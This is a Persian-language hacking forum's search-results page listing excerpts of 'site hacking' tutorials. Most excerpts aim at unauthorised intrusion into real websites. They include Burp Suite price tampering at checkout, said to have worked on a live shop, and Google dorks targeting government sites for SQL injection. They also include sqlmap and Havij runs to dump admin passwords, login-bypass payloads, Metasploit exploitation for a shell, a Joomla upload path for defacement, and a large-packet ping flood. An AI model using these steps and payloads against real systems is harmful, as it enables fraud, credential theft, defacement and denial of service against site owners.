رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'هک سایت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

27 نتیجه پیدا شد

  1. با سلام با اموزش تغییر قیمت محصولات با ابزار Burp suite با شما هستیم خب ابتدا مرورگر خود را باز کنید و در قسمت پروکسی های local خود را تظیم کنید (localhost:808) قبل از این که تنظیم بکنید ادرس سایتی که قصت هک کردنشو دارید رو باز کنید و بعد پروکسی را تنظیم کنید . ابزار Burp suite با زکنید . به قسمت proxy بروید و به بخش intercept بروید و گذینه intercept را on کنید بعد به مروگر خود باز گردید و محصولی که انتخواب کرده بودید را خرید را بزنید به Burp suite برگردید با دقت به کد ها نگاه کنید و اعداد در جایی که payment نوشته و قیمت محصول را نوشته و قیمت خود را وارد کرده و روی forward کلیک کنید الان به جایی میرسه که ازتون میگه سفارش را تایید میکنید بله را بزنید و به جای قیمت محصول قیمت انتخوابی شما را کثر کند . توجه : قبلا این روش را روی یکی از سایت های خارجی تست کردن جواب مثبت گرفتم . استفاده نادرست از اموزش بر عهده خود شخص است . با تشکر
  2. خب دوستان عزیز برایتان میخواهم اموزش نفوذ به پورت های باز از جمله 21 یا 32 برای اینکار میتوانید کالی لینوس را از سایت kali دانلود کنید و روی یک vmware یا سیستم خانگی نصب کنید , خب حالا بگذزیم ما برای هک پورت های باز از دو ابزار استفاده خواهیم کرد شما میتوانید این ابزار هارا از سایتها مربوط به ویندوز خود دانلود و نصب کنید . خب اولیش zenmap یا nmap و دومی metasploit خب ابتدا با دستور zenmap را در ترمینال تایپ کنید برای شما محیط گرافیکی nmap باز خواهد شد تفاوت nmap و zenmap فقط در بخش گرافیکی بودن فرق دارند خب در جای خالی که target نوشته شده است ادرس ایپی تارگت خود را وارد کنید و روی گذینه start کلیک کنید یا از قسمت command حالت اسکن خود را عوض کنید حالا بعد از اینکه روی اسکن کلیک کردید باید صبر کنید تا اسکن پورت ها به پایان برسد بعد به قسمت ports / host بروید و به پورت های باز خود نگاه کنید و جلوی انها version را نگاه کنید مثلا در port 21 یک سایتی که اسکن کرده بودم نوشته بود ProFtp خب الان ترمینال جدید باز میکنیم و در داخلش مینویسیم msfconsole و برای ما برنامه metasploit را نمایش میدهد بعد ما با زدن دستور search ProFtp شروع به یافتن اکسپلوییت مربوط میکند بعد از اینکه اکسپلوییت هارا به شما نشان داد جلوی هر اکسپلویید خاصیتش را نوشته است خب ما الان یک اکسپلویت انتخواب میکنیم برای این کار بای روی اکسپلیوت خود سفید بکشید و با راست کلیک روی کپی کلیک کنید بعد دستور use exploit-pasted شما به جای exploit-pasted اکسپلویت خود را پیست کنید و بعد است انتخواب اکسپلوییت الان به سراغ انتخواب payload میرسد برای این کار باید دستور show payloads را تایپ کنیم در جلوی هر پایلود خاصیت ان پایلود را نوشته است برای انتخواب پایلود روی پایلود انتخوابی خود سفید میکشیم و با راست کلیک کپی میکنیم و با دستور set payload paste شما به جای paste پایلود خود را پیست کنید الان نوبت به تنظیم تارگت ها میرسد برای این کار از دستور show options استفاده میکنیم بعد از این که دستور را زدیم از ما اطلاعاتی را که میخواهد می اورد ما به جای RHOST تارگت خود , به جای RPORT پورت باز تارگت و به جای LHOST ایپی خود و LPORT پورت خود را میگذاریم برای اینکار ابتدا set RHOST TARGET را مینویسیم شما به جای TARGET ایپی هدف خود را بنویسید و همچنین با دستور set RPORT TARGET PORT پورت تارگت را تایین میکنیم برای دیدن ایپی خود میتوانید از ترمینال هم استفاده کنید بنویسی ifconfig یا در گوگل my ip را جست و جو کنید و با دستور set LHOST IP به جای نوشته ip ایپی خودتان را بنویسید و با دستور set RPORT 20000 به جای 20000 پورت خود را مینویسید و بعد با زدن دستور exploit شروع به اکسپلوییت کردم وب سرور میشوید و شما وارد شل وب سرور میشوید ولی باید root وب سرور را دور بزنید میتوانید از ابزار های shellter یا hydra هم کمک بگیرید . تشکر از تیم امنیتی anonysec تمام حق کپی برداری بر anonysec است هرگونه کپی برداری پیگرد قانونی دارد.
  3. خب بریم سراغ اموزش ? 1- ابزار اسکن سایت با کالی لینوکس برترین ابزار اسکن سایت در کالی لینوکس Vega میباشد . جهت نصب ابزار کافیست درقسمت ترمینال کالی لینوکس دستور Apt-get install Vega را تایپ کرده و ابزار را نصب کنید برای اجرای ابزار هم کافیست عبارت Vega را در ترمینال وارد کنید در قسمت target ادرس سایت را نوشته و اسکن کنید . و در اخر نتیجه را بررسی کرده و نوع باگ را بیابید 2- اسکن سایت با ویندوز اول برنامه acuntix را دانلود و نصب کرده و بعد برنامه را اجرا کنید روی new scan کلیک کرده و ادرس سایت را تایپ کرده و روی scan کلیک کنید . در اخر نتیجه را بررسى کرده و نوع باگ را بیابید با تشکر
  4. امروز میخوام اموزش اسکن پورت سایت ها با استفاده از kali linux و یا live hacking و انواع لینوکس. ابتدا در ترمینال لینوکس خود عبارت زیر را تایپ کنید. apt-get install zenmap منتظر بمانید تا ابزار روی لینوکس خود نصب شود. حالا عبارت زیر را تایپ نمایید zenmap حالا در قسمت traget ادرس سایت را بنویسید . خب صبر کنید تا اسکن کند و اطلاعات در کادر پایین برای شما نشان خواهد داد. با تشکر />
  5. در این اموزش که در چند قسمت اماده میشه سعی میکنم تمام مباحثی که sql injection اونا رو پوشش میده توضیح بدم و سعی میکنم همه چی رو به صورت عملی و کاربردی بگم که شما بتونید وب سایت هاتون رو از ف/ی/ل/ت/ر این باگ بگذرونید ، نکته : در این سری اموزش دیتابیس target ما my sql هستش ، اولین کاری که باید انجام بشه پیدا کردن یک تارگت یا قربانی هست (البته شمایی که میخوایید تست نفوذ به وب سایت خودتون رو بزنین دیه این کار لازم نیست). ما فرض میکنیم که شما وب سایت خاصی مد نظرتون نیست و نمیدونید اون تارگتی که میخوایید پیدا کنید کجا هست و چه وب سایتیه ، یک روش برای پیدا کردن تارگت وجود داره اونم جستجو در گوگل هستش به صورت زیر در گوگل جستجو کنید: site:.com.uk inurl:id(inurl):.php نکته این ادرس های نامفهومی که من گذاشتم تو دنیای امنیت (دورک) نام داره. یه سری دورک در زیر قرار میدم: us "site:.gov.uk inurl:"id " site:.gov.us inurl:"id german "site:.gov.de inurl:"id chin "site:.gov.cn inurl:"id etc "site:.gov.aq inurl:"id "site:.gov inurl:"id مثال :شما میتونید تو گوگل سرچ کنید دورک مخصوص باگ sql برای وب سایت های چینی و ... زمانی که سرچ کردید گوگل یه سری لینک به شما میده مث همیشه که سرچ میکنید. ولی یادتون باشه این دورک هایی که من گذاشتم برا سایت های دولتیه و اگه بخوایید یه سایت تجاری یا یه سایت یا شرکتی بزنید باید سرچی رو که انجام میدید بایپس کنید یعنی تغییرش بدید "site:.gov.uk inurl:"id این ادرس بالا رو به ادرس زیر تغییر بدید: "site:.com.uk inurl:"id یا اگه مثلا سایتی رو میخوایید بزنید که تکنولوژی مورد نظری منظورتونه مثلا asp یا php اینطوری بنویسید: site:.com.uk inurl:id(inurl):.asp site:.com.uk inurl:id(inurl):.php خب وقتی شما تارگت مورد نظر رو پیدا کردی حالا باید بررسی کنید که اون سایت در اون صفحه باگ داره یا نه برای این کار شما به دو روش میتونید تست رو انجام بدید: روش کاراکتری روش منطقی روش اول: زمانی که وارد سایت مورد نظر شدید تنها کاری که لازم است انجام دهید اضافه کردن یک کاراکتر تک کوتیشن به اخر ادرس وب سایت است ، مثال: این مثالی که من میزنم اینطور سایتی اصلا وجود نداره فقط محض اموزشه: www.mamamad.com/ ?page_id=759 حالا کافیست که اینو وارد کنید: 'www.mamamad.com/ ?page_id=759 حال اگر وب سایت کامل لود شد و مشکلی نداشت یعنی باگ نداره ولی اگر اون وب سایت به جای لود کردن صفحه ادرس زیر رو نمایان کرد یعنی باگ داره و ما میتونیم به کارمون ادامه بدیم: Warning:mysql_fetch_array():supplied argument is not valid my sql result resource in c:/hosting/45965/html/m.php on line 100 تا این warning یاهشدار رو دیدید بدونید که سایت طرف باگ داره و باید اون سایت رو پیاده کنید. روش دوم : در روش دوم به اخر url یا ادس اینترنتی یه عبارت منطقی مثل زیر اضافه میکنید: And 1=0 And1=1 اگر زمانی and1=0 رو امتحان کردید و صفحه مورد نظر کامل لود نشد و ناقص بود یعنی اسیب پذیره و با اضافه کردن 1=1 هم صفحه باید کامل لود بشه. اینطوری تست منطقی رو انجام بدید: —www.mamamad.com/ ?page_id=759+and+1=0 و اگه میخوایید بدونید که سایت چطوری کامل لود میشه اینو امتحان کنید: —www.mamamad.com/ ?page_id=759+and+1=1 در این قسمت با نحوه جستجو کردن و پیدا کردن تارگت اشنا شدید و یاد گرفتید که چه سایتی باگ داره یا نه . در قسمت های بعدی به ادامه اموزش پرداخته میشود.لطفا اشکالات که بر این اموزش وارد است رو بنویسید تا بهتر و کاربردی تر بشه.
  6. با سلام در این دوره اموزشی قصد دارم اموزش کامل هک یک سرور اپلود کردن شل در آن و هک تمام سایت های آن سرور را بنویسم در پارت یک ما تلاش میکنیم که در یک سرور یک فایل PHP اپلود کنیم که با استفاده از آن دسترسی روت ( دسترسی کامل‌ ) از سایت بگیریم الزامات ما در این بخش اموزشی به nmap نیاز داریم اسکن سرور نصب nmpa : apt-get install nmap برای اسکن تارگت دستور زیر را در ترمینال وارد کنید : nmap target.com مثلا برای تارگت من دستور به صورت زیره : nmap www.meted.ucar.edu
  7. darwvin

    Hacking SQL Injection part2

    در این روز خسته کننده من میخوام sqli دستی رو به صورت کامل توضیح بدم SQLi { SQL Injection } sqli یک تکنیک تزریق کد دارد. برای وب سایت هایی که به این باگ اسیب پذیرند با استفاده از این اسیب پذیری میتوانید اطلاعات مهم را بهره برداری کنید این اطلاعات میتواند یوزرها و پسورد ها باشند که میتوان با آن ها کار های بسیار کردبه عنوان مثال با دریافت یوزر و پسورد ادمین میتوان شل اپلود کرد و سایت را دیفیس کرد تصور کنید یک دستور به پایگاه داده sql ارسال کنید تا کاری که شما میخواهید را انجام دهد: SELECT، INSERT، UPDATE و بهترین دوست من drop. به عنوان مثال دستور زیر پایگاه داده با ورودی کاربر مورد نظر را بدون ف/ی/ل/ت/ر نمایش میده SELECT FROM `users` WHERE `username` = 'sky'
  8. در این ویدئو نحوه ی نفوذ به سایت htc.ac با استفاده از باگ sql injection با متد xpatch رو اماده کردیم.... منتظر آموزش های پایه در این زمینه باشید:) htc.ac.rar
  9. darwvin

    Hacking SQL Injection part1

    درود! در این اموزش قصد دارم به شما یکی از بزرگ ترین باگ ها رو اموزش بدم که سایت های بسیاری زیادی هستند که به این باگ آسیب پذیر هستند. در این پست من هک سایت با این باگ رو با استفاده از sqlmap و havij یاد میدهم و پس از آن روش دستی
  10. فقط کافیه یک cmd باز کنید و دستور زیر رو تایپ کنید ping www.target.com اگ ای پی سایت 31.13.83.36 باشه دستور بعدی به این صورت میشه ping 31.13.83.36 -t -l 99946 نحوه اجرا cmd : windows+r تایپ کنید cmd start رو باز کنید سرچ کنید cmd
  11. darwvin

    هک سایت با کالی sqlmap

    گام اول: نصب sqlmap اگر با کالی میخواین این کار رو انجام بدین میتونید برید به مرحله بعدی ولی اگ با لینوکس دیگ ای اومدین باید این کار هایی ک میگم رو انجام بدین برای نصب اس کیو ال مپ راه های زیادی هست ولی من دو راه ساده رو ذکر میکنم راه اول: میتونید از سایت زیر sqlmap رو دانلود کنید http://sqlmap.org/ در این صورت باید وقتی میخواید این کار رو انجام بدید در پوشه sqlmap باشید و به هر دستوری که مینویسم یک /. اضافه کنید مثلا ./sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs راه دوم استفاده از katoolin هست که اموزشش رو در صفحه زیر نوشتم https://anonysec.org/index.php?/topic/1895-نصب-ابزار-های-کالی-روی-اوبونتو/# گام دوم: پیدا کردن سایت ابتدا باید یک سایت پیدا کنیم که این باگ رو داشته باشه کافیه که یکی از دورک های زیر رو در گوگل سرچ کنید و دنبال سایت بگردید که باگ داره Google Dork string Column 1 Google Dork string Column 2 Google Dork string Column 3 inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id= inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id= inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr= inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id= inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id= inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID= inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?= inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id= inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id= inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id= inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id= inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id= inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id= inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id= inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id= inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id= inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id= inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id= inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id= inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id= inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id= inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id= inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id= inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id= inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id= inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id= inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id= inurl:article.php?id= inurl:communique_detail.php?id= inurl:memberInfo.php?id= inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id= inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id= inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id= inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id= inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id= inurl:historialeer.php?num= inurl:show_an.php?id= inurl:product_ranges_view.php?ID= inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id= inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id= inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id= inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id= inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id= inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id= inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id= inurl:news.php?id= inurl:participant.php?id= inurl:avd_start.php?avd= inurl:download.php?id= inurl:event.php?id= inurl:main.php?id= inurl:product-item.php?id= inurl:review.php?id= inurl:sql.php?id= inurl:chappies.php?id= inurl:material.php?id= inurl:read.php?id= inurl:clanek.php4?id= inurl:prod_detail.php?id= inurl:announce.php?id= inurl:viewphoto.php?id= inurl:chappies.php?id= inurl:article.php?id= inurl:read.php?id= inurl:person.php?id= inurl:viewapp.php?id= inurl:productinfo.php?id= inurl:viewphoto.php?id= inurl:showimg.php?id= inurl:rub.php?idr= inurl:view.php?id= inurl:galeri_info.php?l= inurl:website.php?id= برای اینکه بفهمیم باگ داره یا نه کافیه ک یک ' به اخر ادرس اضافه کنیم مثال: http://www.bible-history.com/subcat.php?id=2 'http://www.bible-history.com/subcat.php?id=2 اگ با ارور زیر مواجه شدید ب این معناست ک سایت این باگ رو داره و میتونیم بریم مرحله بعد ولی اگ ارور نداد پس باید دنبال سایت دیگ ای باشیم Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 البته لازم نیست که حتما این ارور باشه ممکنه ارور های دیگ ای هم دریافت کنید و اگ ارور هم دریافت نکردید دلیل نمیشه ک حتما باگ نداشته باشه
  12. darwvin

    اموزش نصب wpscan

    درود! راه اول نصب اون با استفاده از katoolin که اموزش استفاده از katoolin رو قبلا قرار دادم اما اینجا میخوام یه روش دیگ رو ذکر کنم ابتدا نیاز به نصب git داریم، اگر git را نصب ندارید از دستور زیر برای نصب استفاده کنید. sudo apt-get install git سپس نیاز به نصب Ruby هست، دستورات زیر را به ترتیب وارد کنید. هر دستور را جداگانه اجرا کنید. sudo apt-get update sudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev cd git clone https://github.com/rbenv/rbenv.git ~/.rbenv echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc echo 'eval "$(rbenv init -)"' >> ~/.bashrc exec $SHELL git clone https://github.com/rbenv/ruby-build.git ~/.rbenv/plugins/ruby-build echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc exec $SHELL rbenv install 2.3.1 rbenv global 2.3.1 ruby -v سپس با دستور زیر wpscan را دریافت کنید. git clone https://github.com/wpscanteam/wpscan.git وسپس دستور زیر را وارد کنید تا وارد دایرکتوری wpscan شوید. cd wpscan و در آخر bundler را نصب میکنیم. gem install bundler rbenv rehash برای اجرا شدن wpscan دستور زیر را وارد کنید. ruby wpscan.rb
  13. چگونه یک وبسایت را هک کنیم؟؟؟ همه ما می دانیم که هک چیزی بیش از مهارت این قرن است. پس معنی آن چیست ؟ ' اگر یک مهارت باشه پس هر کسی میتونه این مهارت رو بدست بیاره اما وقتی افرادی رو میبیند که خبره هکن میفهمین بیشتر مثله یک ورزشه و هر کس بیشتر تمرین میکنه قوی تر میشه خب! بریم سره اصل مطلب چطور سایت هک کنیم؟؟ در این سایت (anonysec.ir) اموزش هایه زیادی هست برای هک سایت و در نت اموزش های خیلی زیادی ولی اگ واقعا میخواید یاد بگیرید جایه درستی هستید من امروز میخوام به شما چیزی رو یاد بدم که به نظرم خیلی مفیده آنچه که من قصد دارم امروز به شما نشان دهد کاملا متفاوت از آموزش های دیگر من و خیلی های دیگر است من به شما را با اینکه چگونه با موفقیت سایت هک کنید هدایت میکنم بر اساس تجربیات من. در زیر لیست من است که من لازم دارم برای هک یک وب سایت anonysec.ir شناسایی(The Reconnaissance) *یکی از دلایلی که هکرهای تازه وارد و غیر حرفه موفق به هک یک وبسایت نیستند اینه که صبور نیستند * بیشتر انها میخواهند یک دکمه در کیبورد خود داشته باشند که با اون هر چیزی رو هک کنند اما چنین چیزی نیست اولین کاری که شما باید انجام دهید شناسایی تارگت (هدفه) ولی نه هر شناسایی یک شناسایی که به دردمون بخوره یک شناساییه خوب افرادی که با توسعه نرم افزار اشنا هستند منظور من رو بهتر میفهمن آیا شما میتونید یک برنامه خوب رو توسعه بدید بدون اینکه استاد خوبی داشته باشید؟درست مثل UML در صنعت نرم افزار در اینجا همان است ما به اطلاعات درباره تارگت نیاز داریم تا راحت تر به هدف خود برسیم بعد از شناسایی میتوانیم با ابزار هایی مثله nmap و whatweb و البته nikto که همشون تو کالی هست سعی کنیم سایت رو هک کنیم ADMIN' OR 1=1 #زمانی که url سایت : website/admin/loign/ باشه ممکنه بتونیم با یوزر و پسورد های زیر وارد پنل مدیریت شیم ' OR '1'='1' -- ' OR '1'='1' ({ ' OR '1'='1' /* اما اینجا تموم نمیشه سعی کنید به نوشتن دستورات SQL در ورودی سعی کنید یک دستور در سرور اجرا کنید فیلتر های سایت رو پیدا کنید و سعی کنید ازشون عبور کنید از انها و سعی کنید باگ رو در آنها پیدا کنید و سعی کنید یک نسخه بهره برداری از سی ام اس پیدا کنید anonysec.ir The Evil Google گاهی اوقات من به سادگی برخی وب سایت هارو هک میکنم با کمک جست و جو های گوگل برای جمع آوری اطلاعات و یا هک اگه ازم حمایت کنید اموزش هک با استفاده از گوگل رو در همین سایت هم قرار میدم anonysec.ir Changing the Source Code(تغییر کد منبع) فقط به یاد داشته باشید که زبان های برنامه نویسی مانند PHP، پرل، ASP، پایتون و غیره اجرا بر روی سرور اجازه نمیدهند از وب کپی برداری کنید اما اگ سرور این اجازه را داد یک کپی از آن دریافت کنید و آن را تغییر دهید (Directory Listing) لیست دایرکتوری مرور شخص میتواند خیلی مفید باشد مثلا در یک سایت با مرور چند صفحه ممکنه یک صفحه پیدا کنید که باگ sqli یا هر باگ دیگ ای داشته باشه و فایل هایی مانند رمز عبور را نیز ممکن است در بعضی سایت ها ببینید همچنین شما میتوانید به صورت دستی url های مشکوک را چک کنید : website.com/logs/ website.com/files/ website.com/sql/ website.com/secret/ شما میتوانید با ابزار هایی مانند dirbsuter این کار را به صورت پیشفرض و راحت انجام بدید
  14. darwvin

    هک سایت

    راه های بسیاری برای هک پایگاه داده وجود دارد، و اکثر این تکنیک نیاز به تزریق SQL (های SQLi) است، که یک راه ارسال دستورات SQL به پایگاه داده از یک فرم وب و یا ورودی های دیگر است. در این آموزش، ما تزریق SQL استفاده برای دسترسی به سرور اساسی. بنابراین به جای گرفتن دسترسی به پایگاه داده و داده های آن، ما را به پایگاه داده به عنوان یک واسطه استفاده از به دست آوردن دسترسی به سرور زمینه ای است. یراست میرم سراغ اموزش و توضیح نمیدم مرحله اول: باز کردن ترمینال برای شروع مثل همه اموزش ها در کالی یک ترمینال باز کنید میانبر : ctrl+alt+T مرحله دوم : بازکردن متاسپلویت kali > msfconsole مرحله سوم :بارگزاری ماژول کمکی msf > use auxiliary/admin/mssql/mssql_exec
  15. ابتدا دورک زیر رو در گوگل جست و جو کنید dork: inurl:index.php?option=com_media سپس انتهای آدرس سایت را پاک کنید و این عبارت را به انتهای سایت اضافه کنید /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= و بعد از آن به راحتی صفحه دیفیس خودتون رو آپلود کنید.
  16. اولین مبحث از سایت و سرور هکینک » Footprinting اولین مرحله ی هک است و به جمع آوری اطلاعات در مورد Victim گفته می شود به 3 دسته تقسیم می شود : Whois Nslookup Trace یک سری سایت های registertor هستند که اطلاعاتی در مورد تارگت به ما می دهند سایت برای whois گرفتن : whois.domaintools.com internic.com در کادر وسط آدرس تارگت خوذتون رو وارد می کنید و اطلاعات سایت رو دریافت می کنید نکته : DNS : تبدیل کننده IP به Domain یا آدرسی است که دومین سایت را به هاست متصل می کند برای اینکه بتوانیم تمام سایت های رو یک سرور را ببینیم از سایت زیر استفاده می کنیم : http://yougetsignal.com به قسمت Reverse IP Domain Check رفته و در کادر سایت و یا IP سرور مورد نظر را وارد می کنیم . برای دیدن ساب دومین ها و لیست سرورها و نسخه های سرور ها می توان از سایت زیر استفاده کرد : http://www.netcraft.com اگر در سرور از فایروال لایه 7 استفاده شود ، وب سرور بصورت webserver/1.0 می شود و OS بصورت F5BIG-IP همچنین برای یافتن سایت های مهم روی یک سرور هم می توان از سایت زیر استفاده کرد : http://www.domainbyip.com/
  17. یک سری سایت ها هستند که دارای این باگ اند و شما میتونید به صورت دستی یا از طریق نرم افزار هویج اونو هک کنید از کجا بفهمیم باگ sql داره؟ خب معمولا سایت های باگ دار sql به شکل زیر هستند مثال؛ http://linework.com/news=45 یعنی اخر اونا شامل =عدد یا حروف برای این که بفهمیم باگ داره یا نه این علامتو به اخرش اضافه میکنیم' http://linework.com/news=45' اگه سایت به درستی اجرا نشد و ارور داد مثلا توی ارورش نوشته بود sql mysql یعنی سایت باگ دار و قابل هک خب برای پیدا کردن این سایت ها از گوگل میتونید کمک بگیرید این متنو توی گوگل تایپ کنید تا تارگت ها یا همون سایت ها براتون بیاند و تستشون کنین inurl: /news/php= به جای news میتونید موضوعات دیگ مثل index رو بزارید خب وقتی یه سایت مناسب پیدا کردید نیاز به نرم افزار هویج دارید برای pc لینک دانلود http://uploadboy.com/c0eeq1pxmz9z.html خب نرم افزارو باز کنید و ادرس سایت مورد نظر رو بدون هیچ تغییری بجای ادرس نوشته شده در کادر بالای نرم افزار جای گزین کنید و analyze رو بزنید صبر کنید تا گزینه های info Table و غیره روشن و نمایان بشن بعد بروی Tables بزنید بروی get Tables بزنید ی لیستی نشون داده میشه شما باید user,admin,password,pass یا مشابه اینارو پیدا کنید و تیک بزنید روشون و بعد Get columns رو بزنید بعد یه لیست جدید تر نشون میده که گزینه هاشو مثل pass user یا همچین چیزارو تیک بزنید و Get Data رو بزنید در سمت راست رمز و یوزر ادمین یا صاحب وب نشون داده میشه شما با وارد شدن به صفحه لوگین ادمین و وارد کردن این اطلاعات سایت رو واس خودتون کنید فیلم اموزشی http://uploadboy.com/q1f87mnzd7vo.html
×
×
  • جدید...